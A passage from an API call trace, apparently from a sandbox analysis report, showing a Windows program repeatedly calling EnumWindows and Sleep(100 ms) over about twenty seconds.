(lpEnumFunc=0x563dd0, lParam=0x550000) [0238.931] Sleep (dwMilliseconds=0x64) [0239.030] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0239.032] Sleep (dwMilliseconds=0x64) [0239.083] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0239.084] Sleep (dwMilliseconds=0x64) [0239.119] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0239.120] Sleep (dwMilliseconds=0x64) [0239.173] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0239.174] Sleep (dwMilliseconds=0x64) [0239.219] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0239.220] Sleep (dwMilliseconds=0x64) [0239.235] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0239.236] Sleep (dwMilliseconds=0x64) [0239.348] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0239.350] Sleep (dwMilliseconds=0x64) [0239.469] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0239.470] Sleep (dwMilliseconds=0x64) [0239.559] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0239.563] Sleep (dwMilliseconds=0x64) [0239.637] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0239.641] Sleep (dwMilliseconds=0x64) [0239.700] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0239.701] Sleep (dwMilliseconds=0x64) [0239.762] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0239.763] Sleep (dwMilliseconds=0x64) [0239.819] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0239.821] Sleep (dwMilliseconds=0x64) [0239.873] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0239.875] Sleep (dwMilliseconds=0x64) [0239.923] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0239.924] Sleep (dwMilliseconds=0x64) [0239.966] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0239.967] Sleep (dwMilliseconds=0x64) [0240.069] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0240.073] Sleep (dwMilliseconds=0x64) [0240.184] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0240.189] Sleep (dwMilliseconds=0x64) [0240.278] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0240.282] Sleep (dwMilliseconds=0x64) [0240.349] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0240.350] Sleep (dwMilliseconds=0x64) [0240.463] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0240.464] Sleep (dwMilliseconds=0x64) [0240.605] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0240.607] Sleep (dwMilliseconds=0x64) [0240.688] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0240.689] Sleep (dwMilliseconds=0x64) [0240.782] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0240.784] Sleep (dwMilliseconds=0x64) [0240.889] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0240.890] Sleep (dwMilliseconds=0x64) [0240.976] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0240.978] Sleep (dwMilliseconds=0x64) [0240.983] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0240.984] Sleep (dwMilliseconds=0x64) [0241.002] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0241.003] Sleep (dwMilliseconds=0x64) [0241.044] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0241.048] Sleep (dwMilliseconds=0x64) [0241.132] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0241.136] Sleep (dwMilliseconds=0x64) [0241.200] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0241.205] Sleep (dwMilliseconds=0x64) [0241.296] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0241.298] Sleep (dwMilliseconds=0x64) [0241.370] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0241.370] Sleep (dwMilliseconds=0x64) [0241.500] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0241.501] Sleep (dwMilliseconds=0x64) [0241.563] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0241.564] Sleep (dwMilliseconds=0x64) [0241.617] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0241.618] Sleep (dwMilliseconds=0x64) [0241.621] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0241.622] Sleep (dwMilliseconds=0x64) [0241.829] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0241.830] Sleep (dwMilliseconds=0x64) [0241.921] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0241.922] Sleep (dwMilliseconds=0x64) [0241.979] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0241.980] Sleep (dwMilliseconds=0x64) [0242.105] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0242.107] Sleep (dwMilliseconds=0x64) [0242.282] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0242.283] Sleep (dwMilliseconds=0x64) [0242.341] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0242.342] Sleep (dwMilliseconds=0x64) [0242.375] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0242.376] Sleep (dwMilliseconds=0x64) [0242.460] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0242.463] Sleep (dwMilliseconds=0x64) [0242.516] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0242.517] Sleep (dwMilliseconds=0x64) [0242.625] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0242.626] Sleep (dwMilliseconds=0x64) [0242.716] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0242.720] Sleep (dwMilliseconds=0x64) [0242.778] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0242.782] Sleep (dwMilliseconds=0x64) [0242.956] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0242.958] Sleep (dwMilliseconds=0x64) [0243.003] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0243.004] Sleep (dwMilliseconds=0x64) [0243.062] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0243.064] Sleep (dwMilliseconds=0x64) [0243.183] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0243.187] Sleep (dwMilliseconds=0x64) [0243.281] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0243.282] Sleep (dwMilliseconds=0x64) [0243.375] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0243.375] Sleep (dwMilliseconds=0x64) [0243.428] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0243.429] Sleep (dwMilliseconds=0x64) [0243.502] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0243.503] Sleep (dwMilliseconds=0x64) [0243.635] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0243.637] Sleep (dwMilliseconds=0x64) [0243.724] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0243.724] Sleep (dwMilliseconds=0x64) [0243.783] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0243.784] Sleep (dwMilliseconds=0x64) [0243.895] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0243.896] Sleep (dwMilliseconds=0x64) [0243.962] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0243.963] Sleep (dwMilliseconds=0x64) [0244.015] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0244.016] Sleep (dwMilliseconds=0x64) [0244.143] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0244.144] Sleep (dwMilliseconds=0x64) [0244.205] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0244.207] Sleep (dwMilliseconds=0x64) [0244.250] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0244.251] Sleep (dwMilliseconds=0x64) [0244.295] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0244.296] Sleep (dwMilliseconds=0x64) [0244.359] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0244.360] Sleep (dwMilliseconds=0x64) [0244.469] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0244.470] Sleep (dwMilliseconds=0x64) [0244.579] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0244.580] Sleep (dwMilliseconds=0x64) [0244.671] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0244.672] Sleep (dwMilliseconds=0x64) [0244.763] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0244.765] Sleep (dwMilliseconds=0x64) [0244.783] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0244.783] Sleep (dwMilliseconds=0x64) [0244.827] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0244.828] Sleep (dwMilliseconds=0x64) [0244.845] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0244.846] Sleep (dwMilliseconds=0x64) [0244.858] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0244.859] Sleep (dwMilliseconds=0x64) [0244.890] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0244.891] Sleep (dwMilliseconds=0x64) [0245.016] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0245.017] Sleep (dwMilliseconds=0x64) [0245.067] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0245.068] Sleep (dwMilliseconds=0x64) [0245.134] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0245.135] Sleep (dwMilliseconds=0x64) [0245.266] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0245.268] Sleep (dwMilliseconds=0x64) [0245.320] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0245.324] Sleep (dwMilliseconds=0x64) [0245.419] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0245.424] Sleep (dwMilliseconds=0x64) [0245.495] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0245.496] Sleep (dwMilliseconds=0x64) [0245.626] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0245.627] Sleep (dwMilliseconds=0x64) [0245.697] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0245.699] Sleep (dwMilliseconds=0x64) [0245.752] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0245.753] Sleep (dwMilliseconds=0x64) [0245.840] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0245.845] Sleep (dwMilliseconds=0x64) [0245.949] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0245.956] Sleep (dwMilliseconds=0x64) [0246.031] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0246.032] Sleep (dwMilliseconds=0x64) [0246.120] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0246.121] Sleep (dwMilliseconds=0x64) [0246.174] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0246.175] Sleep (dwMilliseconds=0x64) [0246.195] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0246.196] Sleep (dwMilliseconds=0x64) [0246.233] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0246.235] Sleep (dwMilliseconds=0x64) [0246.328] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0246.329] Sleep (dwMilliseconds=0x64) [0246.408] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0246.409] Sleep (dwMilliseconds=0x64) [0246.483] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0246.484] Sleep (dwMilliseconds=0x64) [0246.607] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0246.611] Sleep (dwMilliseconds=0x64) [0246.703] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0246.704] Sleep (dwMilliseconds=0x64) [0246.746] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0246.752] Sleep (dwMilliseconds=0x64) [0246.794] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0246.799] Sleep (dwMilliseconds=0x64) [0246.820] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0246.820] Sleep (dwMilliseconds=0x64) [0246.825] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0246.825] Sleep (dwMilliseconds=0x64) [0246.905] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0246.907] Sleep (dwMilliseconds=0x64) [0247.012] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0247.017] Sleep (dwMilliseconds=0x64) [0247.135] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0247.136] Sleep (dwMilliseconds=0x64) [0247.231] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0247.235] Sleep (dwMilliseconds=0x64) [0247.284] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0247.285] Sleep (dwMilliseconds=0x64) [0247.298] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0247.299] Sleep (dwMilliseconds=0x64) [0247.343] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0247.344] Sleep (dwMilliseconds=0x64) [0247.382] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0247.383] Sleep (dwMilliseconds=0x64) [0247.455] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0247.456] Sleep (dwMilliseconds=0x64) [0247.719] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0247.721] Sleep (dwMilliseconds=0x64) [0248.014] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0248.015] Sleep (dwMilliseconds=0x64) [0248.117] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0248.119] Sleep (dwMilliseconds=0x64) [0248.231] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0248.233] Sleep (dwMilliseconds=0x64) [0248.326] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0248.327] Sleep (dwMilliseconds=0x64) [0248.429] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0248.431] Sleep (dwMilliseconds=0x64) [0248.568] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0248.570] Sleep (dwMilliseconds=0x64) [0248.745] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0248.746] Sleep (dwMilliseconds=0x64) [0248.964] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0248.966] Sleep (dwMilliseconds=0x64) [0249.109] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0249.111] Sleep (dwMilliseconds=0x64) [0249.234] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0249.236] Sleep (dwMilliseconds=0x64) [0249.325] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0249.329] Sleep (dwMilliseconds=0x64) [0249.406] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0249.407] Sleep (dwMilliseconds=0x64) [0249.426] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0249.426] Sleep (dwMilliseconds=0x64) [0249.436] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0249.437] Sleep (dwMilliseconds=0x64) [0249.469] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0249.471] Sleep (dwMilliseconds=0x64) [0249.526] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0249.528] Sleep (dwMilliseconds=0x64) [0249.594] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0249.595] Sleep (dwMilliseconds=0x64) [0249.719] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0249.721] Sleep (dwMilliseconds=0x64) [0249.811] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0249.813] Sleep (dwMilliseconds=0x64) [0249.878] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0249.879] Sleep (dwMilliseconds=0x64) [0249.940] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0249.941] Sleep (dwMilliseconds=0x64) [0250.116] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0250.118] Sleep (dwMilliseconds=0x64) [0250.178] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0250.179] Sleep (dwMilliseconds=0x64) [0250.197] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0250.199] Sleep (dwMilliseconds=0x64) [0250.225] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0250.226] Sleep (dwMilliseconds=0x64) [0250.267] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0250.268] Sleep (dwMilliseconds=0x64) [0250.346] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0250.347] Sleep (dwMilliseconds=0x64) [0250.376] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0250.377] Sleep (dwMilliseconds=0x64) [0250.463] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0250.468] Sleep (dwMilliseconds=0x64) [0250.552] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0250.553] Sleep (dwMilliseconds=0x64) [0250.601] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0250.606] Sleep (dwMilliseconds=0x64) [0250.705] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0250.707] Sleep (dwMilliseconds=0x64) [0250.748] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0250.750] Sleep (dwMilliseconds=0x64) [0250.791] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0250.792] Sleep (dwMilliseconds=0x64) [0250.829] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0250.830] Sleep (dwMilliseconds=0x64) [0250.890] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0250.891] Sleep (dwMilliseconds=0x64) [0250.909] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0250.910] Sleep (dwMilliseconds=0x64) [0250.952] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0250.953] Sleep (dwMilliseconds=0x64) [0251.031] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0251.032] Sleep (dwMilliseconds=0x64) [0251.089] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0251.093] Sleep (dwMilliseconds=0x64) [0251.218] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0251.219] Sleep (dwMilliseconds=0x64) [0251.273] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0251.275] Sleep (dwMilliseconds=0x64) [0251.367] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0251.373] Sleep (dwMilliseconds=0x64) [0251.417] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0251.422] Sleep (dwMilliseconds=0x64) [0251.473] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0251.475] Sleep (dwMilliseconds=0x64) [0251.491] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0251.498] Sleep (dwMilliseconds=0x64) [0251.544] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0251.546] Sleep (dwMilliseconds=0x64) [0251.592] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0251.593] Sleep (dwMilliseconds=0x64) [0251.715] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0251.720] Sleep (dwMilliseconds=0x64) [0251.828] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0251.830] Sleep (dwMilliseconds=0x64) [0251.901] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0251.902] Sleep (dwMilliseconds=0x64) [0251.972] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0251.974] Sleep (dwMilliseconds=0x64) [0252.066] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0252.067] Sleep (dwMilliseconds=0x64) [0252.173] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0252.174] Sleep (dwMilliseconds=0x64) [0252.218] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0252.219] Sleep (dwMilliseconds=0x64) [0252.269] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0252.271] Sleep (dwMilliseconds=0x64) [0252.325] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0252.330] Sleep (dwMilliseconds=0x64) [0252.345] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0252.346] Sleep (dwMilliseconds=0x64) [0252.359] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0252.361] Sleep (dwMilliseconds=0x64) [0252.454] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0252.455] Sleep (dwMilliseconds=0x64) [0252.560] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0252.564] Sleep (dwMilliseconds=0x64) [0252.621] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0252.625] Sleep (dwMilliseconds=0x64) [0252.731] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0252.828] Sleep (dwMilliseconds=0x64) [0252.906] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0252.907] Sleep (dwMilliseconds=0x64) [0253.003] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0253.004] Sleep (dwMilliseconds=0x64) [0253.111] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0253.112] Sleep (dwMilliseconds=0x64) [0253.303] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0253.304] Sleep (dwMilliseconds=0x64) [0253.431] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0253.432] Sleep (dwMilliseconds=0x64) [0253.523] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0253.527] Sleep (dwMilliseconds=0x64) [0253.780] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0253.781] Sleep (dwMilliseconds=0x64) [0253.872] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0253.873] Sleep (dwMilliseconds=0x64) [0253.928] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0253.929] Sleep (dwMilliseconds=0x64) [0253.945] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0253.946] Sleep (dwMilliseconds=0x64) [0253.981] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0253.982] Sleep (dwMilliseconds=0x64) [0254.016] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0254.017] Sleep (dwMilliseconds=0x64) [0254.028] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0254.029] Sleep (dwMilliseconds=0x64) [0254.044] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0254.045] Sleep (dwMilliseconds=0x64) [0254.091] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0254.092] Sleep (dwMilliseconds=0x64) [0254.161] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0254.162] Sleep (dwMilliseconds=0x64) [0254.216] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0254.218] Sleep (dwMilliseconds=0x64) [0254.297] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0254.298] Sleep (dwMilliseconds=0x64) [0254.387] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0254.389] Sleep (dwMilliseconds=0x64) [0254.454] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0254.456] Sleep (dwMilliseconds=0x64) [0254.510] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0254.564] Sleep (dwMilliseconds=0x64) [0254.583] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0254.584] Sleep (dwMilliseconds=0x64) [0254.590] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0254.591] Sleep (dwMilliseconds=0x64) [0254.624] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0254.625] Sleep (dwMilliseconds=0x64) [0254.782] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0254.783] Sleep (dwMilliseconds=0x64) [0254.839] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0254.841] Sleep (dwMilliseconds=0x64) [0254.944] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0254.945] Sleep (dwMilliseconds=0x64) [0255.046] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0255.047] Sleep (dwMilliseconds=0x64) [0255.094] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0255.094] Sleep (dwMilliseconds=0x64) [0255.116] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0255.117] Sleep (dwMilliseconds=0x64) [0255.173] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0255.192] Sleep (dwMilliseconds=0x64) [0255.247] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0255.248] Sleep (dwMilliseconds=0x64) [0255.296] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0255.297] Sleep (dwMilliseconds=0x64) [0255.388] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0255.390] Sleep (dwMilliseconds=0x64) [0255.466] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0255.470] Sleep (dwMilliseconds=0x64) [0255.530] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0255.532] Sleep (dwMilliseconds=0x64) [0255.589] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0255.591] Sleep (dwMilliseconds=0x64) [0255.614] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0255.615] Sleep (dwMilliseconds=0x64) [0255.621] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0255.625] Sleep (dwMilliseconds=0x64) [0255.685] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0255.686] Sleep (dwMilliseconds=0x64) [0255.781] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0255.782] Sleep (dwMilliseconds=0x64) [0255.841] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0255.845] Sleep (dwMilliseconds=0x64) [0256.030] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0256.031] Sleep (dwMilliseconds=0x64) [0256.267] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0256.269] Sleep (dwMilliseconds=0x64) [0256.372] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0256.376] Sleep (dwMilliseconds=0x64) [0256.450] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0256.455] Sleep (dwMilliseconds=0x64) [0256.727] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0256.729] Sleep (dwMilliseconds=0x64) [0256.864] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0256.865] Sleep (dwMilliseconds=0x64) [0257.028] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0257.030] Sleep (dwMilliseconds=0x64) [0257.149] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0257.151] Sleep (dwMilliseconds=0x64) [0257.278] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0257.280] Sleep (dwMilliseconds=0x64) [0257.392] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0257.394] Sleep (dwMilliseconds=0x64) [0257.465] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0257.467] Sleep (dwMilliseconds=0x64) [0257.737] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0257.738] Sleep (dwMilliseconds=0x64) [0257.892] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0257.894] Sleep (dwMilliseconds=0x64) [0257.947] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0257.948] Sleep (dwMilliseconds=0x64) [0257.995] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0257.997] Sleep (dwMilliseconds=0x64) [0258.034] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0258.036] Sleep (dwMilliseconds=0x64) [0258.057] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0258.064] Sleep (dwMilliseconds=0x64) [0258.110] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0258.111] Sleep (dwMilliseconds=0x64) [0258.152] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0258.153] Sleep (dwMilliseconds=0x64) [0258.204] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0258.205] Sleep (dwMilliseconds=0x64) [0258.343] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0258.345] Sleep (dwMilliseconds=0x64) [0258.390] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0258.390] Sleep (dwMilliseconds=0x64) [0258.488] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0258.489] Sleep (dwMilliseconds=0x64) [0258.578] 